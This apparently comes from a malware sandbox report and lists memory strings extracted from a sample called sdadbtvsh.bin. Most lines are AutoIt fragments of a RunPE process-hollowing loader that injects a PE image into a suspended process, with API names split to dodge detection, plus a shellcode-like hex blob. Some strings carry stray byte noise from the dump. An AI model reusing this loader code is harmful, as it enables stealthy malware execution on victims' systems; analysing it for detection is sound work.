Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $var110 = dllcall("advapi32.dll", "dword", "setentriesinacla", "ulong", "1", "ptr", $var106, "ptr", "0", "ptr", $var108)	memstr_e62aa5b4-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $var113 = dllcall("advapi32.dll", "dword", "setsecurityinfo", "handle", $var92, "int", "6", "dword", "0x00000004", "dword", "0", "dword", "0", "ptr", dllstructgetdata($var95, 1), "ptr", 0)	memstr_df0d5134-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if not ubound($var110) then return seterror(4, 0, false)	memstr_1210144c-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if not ubound($var113) then return seterror(5, 0, false)	memstr_a6084d8e-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($tmodule, 1, dllstructgetdata($theaders, 1))/$	memstr_9b44293f-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $smagic = dllstructgetdata($timage_dos_header, "magic")	memstr_357ad393-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $var110[0] <> 0 then return seterror(6, $var110[0], false)a$u	memstr_e2253d7a-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $var113[0] <> 0 then return seterror(7, $var113[0], false)	memstr_531db188-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $fautoitx64 and _runbinary_iswow64process($handlerpro) thens%c	memstr_feebff9f-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t`xvp	memstr_afdcca5e-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hl0vp	memstr_9f486204-f
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ~pxp	memstr_07ece005-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: =ghvp	memstr_971b4a7e-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endifl&_	memstr_2ed38096-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: elseq&d	memstr_7f575c80-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ^v`vp	memstr_156ece7b-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #pwp	memstr_5b87c7e3-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: case 1	memstr_a4c3253c-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: case 2	memstr_51481cb9-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: case 3	memstr_cebd67c4-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif('	memstr_f6f04665-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif/'	memstr_f6f5119e-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: case 3$'	memstr_9b07f697-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif='	memstr_99f2f96e-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif]'`	memstr_c1d0d251-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runpe($bbinaryimage, $scommandline = '', $sexemodule = @autoitexe)	memstr_989e5ce3-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $tbinary = dllstructcreate("byte[" & binarylen($bbinary) & "]")	memstr_9411307d-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $tstartupinfo = dllstructcreate("dword cbsize;" & "ptr reserved;" & "ptr desktop;" & "ptr title;" & "dword x;" & "dword y;" & "dword xsize;" & "dword ysize;" & "dword xcountchars;" & "dword ycountchars;" & "dword fillattribute;" & "dword flags;" & "word showwindow;" & "word reserved2;" & "ptr reserved2;" & "ptr hstdinput;" & "ptr hstdoutput;" & "ptr hstderror")	memstr_de68ad62-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $tprocess_information = dllstructcreate("ptr process;" & "ptr thread;" & "dword processid;" & "dword threadid")	memstr_9eba84be-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $acall = dllcall("kernel32.dll", "bool", "createprocessw", "wstr", $sexemodule, "wstr", $scommandline, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", dllstructgetptr($tstartupinfo), "ptr", dllstructgetptr($tprocess_information))	memstr_bcde8035-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0)	memstr_78bfe17c-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ivirtualaddress, $isizeofblock, $inumberofentries !	memstr_5a1fc97a-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $tmagic = dllstructcreate("word magic;", $ppointer)	memstr_afb80f61-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0) "	memstr_bec0b261-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0)@"\|	memstr_8c20e9c1-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_unmapviewofsection($handlerpro, $paddress)	memstr_2035a622-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $handlerpro = dllstructgetdata($tprocess_information, "process")	memstr_2b1a6f5d-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0)p	memstr_42f0e62c-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $tcontext = dllstructcreate("dword con" & "text" & "flags;" & "dword dr0; dword dr1; dword dr2; dword dr3; dword dr6; dword dr7;" & "dword controlword; dword statusword; dword tagword; dword erroroffset; dword errorselector; dword dataoffset; dword dataselector; byte registerarea[80]; dword cr0npxstate;" & "dword seggs; dword segfs; dword seges; dword segds;" & "dword edi; dword esi; dword ebx; dword edx; dword ecx; dword eax;" & "dword ebp; dword eip; dword segcs; dword eflags; dword esp; dword segss;" & "byte extendedregisters[512]")"u	memstr_b928f963-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $timage_dos_header = dllstructcreate("char magic[2];" & "word bytesonlastpage;" & "word pages;" & "word relocations;" & "word sizeofheader;" & "word minimumextra;" & "word maximumextra;" & "word ss;" & "word sp;" & "word checksum;" & "word ip;" & "word cs;" & "word relocation;" & "word overlay;" & "char reserved[8];" & "word oemidentifier;" & "word oeminformation;" & "char reserved2[20];" & "dword addressofnewexeheader", $ppointer)64	memstr_e448c2a7-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eptiontorip; ui	memstr_877a363e-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////"3////"e;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")	memstr_223c5176-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $tcontext = dllstructcreate("align 16; uint64 p1home; uint64 p2home; uint64 p3home; uint64 p4home; uint64 p5home; uint64 p6home;" & "dword cont" & "ext" & "flags; dword mxcsr;" & "word segcs; word segds; word seges; word segfs; word seggs; word segss; dword eflags;" & "uint64 dr0; uint64 dr1; uint64 dr2; uint64 dr3; uint64 dr6; uint64 dr7;" & "uint64 rax; uint64 rcx; uint64 rdx; uint64 rbx; uint64 rsp; uint64 rbp; uint64 rsi; uint64 rdi; uint64 r8; uint64 r9; uint64 r10; uint64 r11; uint64 r12; uint64 r13; uint64 r14; uint64 r15;" & "uint64 rip;" & "uint64 header[4]; uint64 legacy[16]; uint64 xmm0[2]; uint64 xmm1[2]; uint64 xmm2[2]; uint64 xmm3[2]; uint64 xmm4[2]; uint64 xmm5[2]; uint64 xmm6[2]; uint64 xmm7[2]; uint64 xmm8[2]; uint64 xmm9[2]; uint64 xmm10[2]; uint64 xmm11[2]; uint64 xmm12[2]; uint64 xmm13[2]; uint64 xmm14[2]; uint64 xmm15[2];" & "uint64 vectorregister[52]; uint64 vectorcontrol;" & "uint64 debugcontrol; uint64 lastbranchtorip; uint64 lastbranchfromrip; uint64 lastexceptiontorip; uint64 lastexceptionfromrip")	memstr_4af418ca-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0)	memstr_68895962-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $timage_nt_signature = dllstructcreate("dword signature", $ppointer)	memstr_92c54b9c-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if dllstructgetdata($timage_nt_signature, "signature") <> 17744 then	memstr_064ee42e-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $timage_file_header = dllstructcreate("word machine;" & "word numberofsections;" & "dword timedatestamp;" & "dword pointertosymboltable;" & "dword numberofsymbols;" & "word sizeofoptionalheader;" & "word characteristics", $ppointer)	memstr_49c2e699-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $inumberofsections = dllstructgetdata($timage_file_header, "numberofsections")	memstr_4f62f5b1-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $timage_optional_header = dllstructcreate("word magic;" & "byte majorlinkerversion;" & "byte minorlinkerversion;" & "dword sizeofcode;" & "dword sizeofinitializeddata;" & "dword sizeofuninitializeddata;" & "dword addressofentrypoint;" & "dword baseofcode;" & "dword baseofdata;" & "dword imagebase;" & "dword sectionalignment;" & "dword filealignment;" & "word majoroperatingsystemversion;" & "word minoroperatingsystemversion;" & "word majorimageversion;" & "word minorimageversion;" & "word majorsubsystemversion;" & "word minorsubsystemversion;" & "dword win32versionvalue;" & "dword sizeofimage;" & "dword sizeofheaders;" & "dword checksum;" & "word subsystem;" & "word dllcharacteristics;" & "dword sizeofstackreserve;" & "dword sizeofstackcommit;" & "dword sizeofheapreserve;" & "dword sizeofheapcommit;" & "dword loaderflags;" & "dword numberofrvaandsizes", $ppointer)	memstr_b5e6a46b-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $timage_optional_header = dllstructcreate("word magic;" & "byte majorlinkerversion;" & "byte minorlinkerversion;" & "dword sizeofcode;" & "dword sizeofinitializeddata;" & "dword sizeofuninitializeddata;" & "dword addressofentrypoint;" & "dword baseofcode;" & "uint64 imagebase;" & "dword sectionalignment;" & "dword filealignment;" & "word majoroperatingsystemversion;" & "word minoroperatingsystemversion;" & "word majorimageversion;" & "word minorimageversion;" & "word majorsubsystemversion;" & "word minorsubsystemversion;" & "dword win32versionvalue;" & "dword sizeofimage;" & "dword sizeofheaders;" & "dword checksum;" & "word subsystem;" & "word dllcharacteristics;" & "uint64 sizeofstackreserve;" & "uint64 sizeofstackcommit;" & "uint64 sizeofheapreserve;" & "uint64 sizeofheapcommit;" & "dword loaderflags;" & "dword numberofrvaandsizes", $ppointer)	memstr_f521dc63-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ientrypointnew = dllstructgetdata($timage_optional_header, "addressofentrypoint")	memstr_9ecaadc9-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ioptionalheadersizeofheadersnew = dllstructgetdata($timage_optional_header, "sizeofheaders")	memstr_44fe8b5f-f
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $poptionalheaderimagebasenew = dllstructgetdata($timage_optional_header, "imagebase")	memstr_0a5a2796-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ioptionalheadersizeofimagenew = random(104857600, 209715200, 1)	memstr_d2ff2c82-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $timage_dir3ctory_entry_basereloc = dllstructcreate("dword virtualaddress; dword size", $ppointer)	memstr_95224542-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $paddressnewbasereloc = dllstructgetdata($timage_dir3ctory_entry_basereloc, "virtualaddress")	memstr_b49ab16f-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $paddressnewbasereloc and $isizebasereloc then $frelocatable = true	memstr_fdefa476-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: consolewrite("!!!not relocatable module. i will try but this may not work!!!" & @crlf)	memstr_375d623e-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $pzeropoint = _runbinary_allocateexespace($handlerpro, $ioptionalheadersizeofimagenew)	memstr_b8cb1187-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $pzeropoint = _runbinary_allocateexespaceataddress($handlerpro, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)	memstr_cb0edd35-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_unmapviewofsection($handlerpro, $poptionalheaderimagebasenew)	memstr_9c9e8b93-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $theaders = dllstructcreate("byte[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new)	memstr_c06916d5-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc'4g	memstr_b958d137-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc<4p	memstr_07a1234f-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: case 185\|	memstr_67817d58-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif45	memstr_93c2a76e-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: case 25	memstr_beafd5bf-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc~5>	memstr_f1468e40-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endifp54	memstr_044c7d15-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $timage_section_header = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword pointertorawdata;" & "dword pointertorelocations;" & "dword pointertolinenumbers;" & "word numberofrelocations;" & "word numberoflinenumbers;" & "dword characteristics", $ppointer)	memstr_0a9754ba-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $isizeofrawdata = dllstructgetdata($timage_section_header, "sizeofrawdata")	memstr_1021f23f-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ppointertorawdata = $pheaders_new + dllstructgetdata($timage_section_header, "pointertorawdata")	memstr_ebfa204c-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ivirtualaddress = dllstructgetdata($timage_section_header, "virtualaddress")	memstr_1c67e194-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ivirtualsize = dllstructgetdata($timage_section_header, "unionofvirtualsizeandphysicaladdress")	memstr_ecfab749-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $ivirtualsize and $ivirtualsize < $isizeofrawdata then $isizeofrawdata = $ivirtualsize	memstr_8038deaf-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata(dllstructcreate("byte[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, dllstructgetdata(dllstructcreate("byte[" & $isizeofrawdata & "]", $ppointertorawdata), 1))	memstr_cb47521f-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $ivirtualaddress <= $paddressnewbasereloc and $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc then	memstr_005a2846-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $trelocraw = dllstructcreate("byte[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress))	memstr_3f303aa5-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $frelocate then _runbinary_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523)	memstr_222969d9-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "write" & "proces" & "smemo" & "ry", "handle", $handlerpro, "ptr", $pzeropoint, "ptr", $pmodule, "dword_ptr", $ioptionalheadersizeofimagenew, "dword_ptr*", 0)	memstr_f5648c2b-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $tpeb = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")	memstr_c25ca4d7-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "rea"&"dproces"&"sme"&"mory", "ptr", $handlerpro, "ptr", $ppeb, "ptr", dllstructgetptr($tpeb), "dword_ptr", dllstructgetsize($tpeb), "dword_ptr*", 0)	memstr_32dfe5c5-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "writep" & "roc" & "essmem" & "ory", "handle", $handlerpro, "ptr", $ppeb, "ptr", dllstructgetptr($tpeb), "dword_ptr", dllstructgetsize($tpeb), "dword_ptr*", 0)	memstr_432ab3b0-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($tcontext, "e" & "ax", $pzeropoint + $ientrypointnew)	memstr_b8a02692-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $hthread, "ptr", dllstructgetptr($tcontext))	memstr_4c017cd9-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0)+2{	memstr_387e6752-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $acall = dllcall("kernel32.dll", "dword", "resumethread", "handle", $hthread)	memstr_14e12db1-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $handlerpro)	memstr_210308b0-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64)	memstr_86047cca-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $timage_base_relocation = dllstructcreate("dword virtualaddress; dword sizeofblock", $pdata + $irelativemove)	memstr_df28795c-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ivirtualaddress = dllstructgetdata($timage_base_relocation, "vir"&"tual"&"add"&"ress")	memstr_4c311be2-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $isizeofblock = dllstructgetdata($timage_base_relocation, "sizeofblock")	memstr_30309b9b-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $tenries = dllstructcreate("word[" & $inumberofentries & "]", dllstructgetptr($timage_base_relocation) + 8)	memstr_1f7134ee-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if @error then return seterror(1, 0, 0)	memstr_02676aa6-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($bufferasm, 1, $asm)	memstr_67465d44-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if bitshift($idata, 12) = $iflag then	memstr_394b7fdd-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $taddress = dllstructcreate("ptr", $pmodule + $ivirtualaddress + bitand($idata, 0xfff))	memstr_c3cb89bb-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($taddress, 1, dllstructgetdata($taddress, 1) + $idelta)	memstr_c6ddcff5-d
